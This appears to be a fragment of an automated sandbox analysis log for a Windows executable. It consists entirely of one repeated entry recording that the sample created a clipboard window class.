        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
